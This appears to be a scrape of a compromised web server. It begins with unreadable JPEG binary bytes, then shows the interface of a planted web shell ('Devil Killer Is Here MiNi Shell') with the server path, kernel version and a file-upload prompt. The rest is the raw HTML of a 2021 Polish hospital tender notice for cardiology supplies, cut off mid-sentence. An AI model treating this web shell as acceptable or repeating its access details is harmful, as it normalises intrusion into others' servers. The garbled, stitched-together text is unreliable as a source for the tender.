JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210901/0016609502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> EP/220/41/2021 Dostawa sprzętu jednorazowego użytku do zabiegów kardiologii inwazyjnej dla SPWSZ w Szczecinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Wojewódzki Szpital Zespolony w Szczecinie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SPWSZ w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000290274</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Arkońska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-455</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@spwsz.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spwsz.szczecin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> EP/220/41/2021 Dostawa sprzętu jednorazowego użytku do zabiegów kardiologii inwazyjnej dla SPWSZ w Szczecinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8b3f6e26-fa8b-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00166095</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005240/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.23 Sprzęt jednorazowego użytku do zabiegów kardiologii interwencyjnej ( w tym amplatzery)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/spwsz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/spwsz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>PlatformySmartPZP(dalej – „Platforma”). Wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje,przekazywanesą w formie elektronicznej, w zakładce „Korespondencja”. W celu<br/>skorzystania zPlatformy koniecznajest rejestracja Wykonawcy pod adresem:<br/>https://portal.smartpzp.pl/spwsz pokliknięciu na przycisk„Załóż konto”. Wykonawca rejestrując się<br/>akceptuje warunki korzystania zPlatformy, określone wRegulaminie podczas rejestracji oraz uznaje go<br/>za wiążący. Korzystanie zPlatformy jest bezpłatne.Podgląd i pobieranie dokumentacji postępowania nie<br/>wymaga logowania.Zamawiający, informuje, żePlatforma jest kompatybilna ze wszystkimi podpisami<br/>elektronicznymi. Doprzesłania dokumentów izłożenia oferty nie jest niezbędne posiadanie certyfikatu<br/>kwalifikowanego.Szczegółowe informacje o sposobie pozyskania usługi kwalifikowanego podpisu<br/>elektronicznego orazwarunkach jej użyciamożna znaleźć na stronach internetowych kwalifikowanych<br/>dostawców usługzaufania, których lista znajduje się pod adresem internetowym:<br/>http://www.nccert.pl/kontakt.htm.Minimalne wymagania techniczne dotyczące korzystania z Platformy<br/>zostały określone w SWZ,rozdz.10 pkt 10.7 oraz 10.8.Pozostałe wymagania techniczne zostały<br/>opisane w rozdz. 10 SWZ:Wskazanie osób uprawnionych do komunikowania się z Wykonawcami.<br/>Informacje o środkachkomunikacji elektronicznej, przy użyciu których Zamawiający będzie<br/>komunikował się z Wykonawcamioraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłani i odbieraniakorespondencji elektronicznej.Osobą uprawnioną do<br/>porozumiewania się z Wykonawcami jest: WioletaBrazewicz, od poniedziałku do piątku w godz. 07:25<br/>– 15:00, z wyłączeniem dni wolnych od pracy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2<br/>rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych osobowych)(Dz. Urz. UE L119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż<br/>administratoremdanych osobowych jest Samodzielny Publiczny Wojewódzki Szpital Zespolony w<br/>Szczecinie, ul.Arkońska 4, 71-455 Szczecin. Administrator wyznaczył Inspektora Ochrony Danych<br/>Osobowych p.Andżelika Skobel, zktórym w sprawach dotyczących przetwarzania danych osobowych<br/>możnaskontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@spwsz.szczecin.pl.<br/>lubtelefonicznie pod numerem 91 813 95 80. Zamawiający przetwarza dane osobowe zebrane<br/>wniniejszym postępowaniuo udzielenie zamówienia publicznego w sposób gwarantujący<br/>zabezpieczenieprzed ich bezprawnym rozpowszechnianiem. Dane osobowe pozyskane w związku z<br/>prowadzeniemniniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane,<br/>zgodnie z art.78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówieniapublicznego, ajeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czastrwania umowy w sprawie zamówienia publicznego. Niezależnie od postanowień<br/>powyżej, w przypadkuzawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą<br/>przetwarzane do upływuokresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia<br/>publicznego.Daneosobowe pozyskane w związku z prowadzeniem niniejszego postępowania o<br/>udzieleniezamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym<br/>usługi prawne, ikonsultingowe. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie<br/>będąpodejmowane w sposób zautomatyzowany. Osoba, której dotyczą pozyskane w<br/>związkuzprowadzeniem niniejszego postępowania dane osobowe, ma prawo:1) dostępu do swoich<br/>danychosobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obowiązków, o<br/>którychmowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający<br/>możeżądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególnościpodania nazwy lub daty bieżącego bądź zakończonego postępowania o udzielenie<br/>zamówieniapublicznego;2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy<br/>czymskorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>wart. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówieniapublicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może<br/>naruszaćintegralności protokołu oraz jego załączników;3) do żądania od Zamawiającego – jako<br/>administratora,ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu doprzechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznegoUniiEuropejskiej lub państwa członkowskiego; prawo to nie ogranicza przetwarzania<br/>danychosobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;4)<br/>wniesieniaskargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jejdanych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.Obowiązekpodania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>PZP, związanym zudziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodaniaokreślonych danych określa PZP.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający udostępnia dane osobowe, o których<br/>mowawart. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w<br/>dzialeVI PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych osobowych, o których<br/>mowa wart. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie.<br/>Osobydopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w<br/>poufności.Daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>zprowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego<br/>orazjegorozstrzygnięciem, jakrównież, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP –celuzawarcia umowy wsprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowaniapostępowania o udzielenie zamówienia i jego archiwizacji. Odbiorcami danych<br/>osobowych będą osobylub podmioty, którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o przepisy PZP.Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w<br/>związku z prowadzeniemniniejszegopostępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:1) prawo do usunięciadanych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e<br/>RODO, 2) prawo do przenoszeniadanych osobowych, o którym mowa w art. 20 RODO, określone w<br/>art. 21 RODO prawo sprzeciwuwobec przetwarzania danych osobowych, a to z uwagi na fakt, że<br/>podstawą prawną przetwarzaniadanychosobowych jest art. 6 ust. 1 lit. c RODO. Dane osobowe mogą<br/>być przekazywane do organówpublicznych i urzędów państwowych lub innych podmiotów<br/>upoważnionych na podstawie przepisówprawa lub wykonujących zadania realizowane w interesie<br/>publicznym lub w ramach sprawowaniawładzy publicznej, w szczególności do podmiotów<br/>prowadzących działalność kontrolną wobecZamawiającego. Dane osobowe są przekazywane do<br/>podmiotów przetwarzających dane w imieniuadministratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EP/220/41/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia oraz wymagane parametry graniczne dla zadania nr 1 - Zestawy do zamykania ubytków w przegrodach serca oraz nieprawidłowych stanowi załącznik nr 1 i 1A do SWZ dla zadania nr 1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry jakościowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia oraz wymagane parametry graniczne dla zadania nr 2 - stanowi załącznik nr 1 i 1A do SWZ dla zadania nr 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">parametry jakościowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia oraz wymagane parametry graniczne stanowi załącznik nr 1 i 1A do SWZ dla zadania nr 3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">parametry jakościowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 7.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi załącznik nr 5 do SWZ),<br/>b)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia przedmiotowych środków dowodowych w postaci kart katalogowych lub folderów lub ulotek informacyjnych lub kart technicznych potwierdzających zgodność z rzeczywistością oświadczeń Wykonawcy dotyczących parametrów podlegających ocenie w ramach pozacenowych kryteriów oceny ofert oraz potwierdzających zgodność oferowanego przez Wykonawcę świadczenia z cechami określonymi w SWZ, w tym w szczególności załączniku nr 1, 1A i 1B do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> karty katalogowe lub foldery lub ulotki informacyjne lub karty techniczne potwierdzające zgodność z rzeczywistością oświadczeń Wykonawcy potwierdzających zgodność oferowanego przez Wykonawcę świadczenia z cechami określonymi 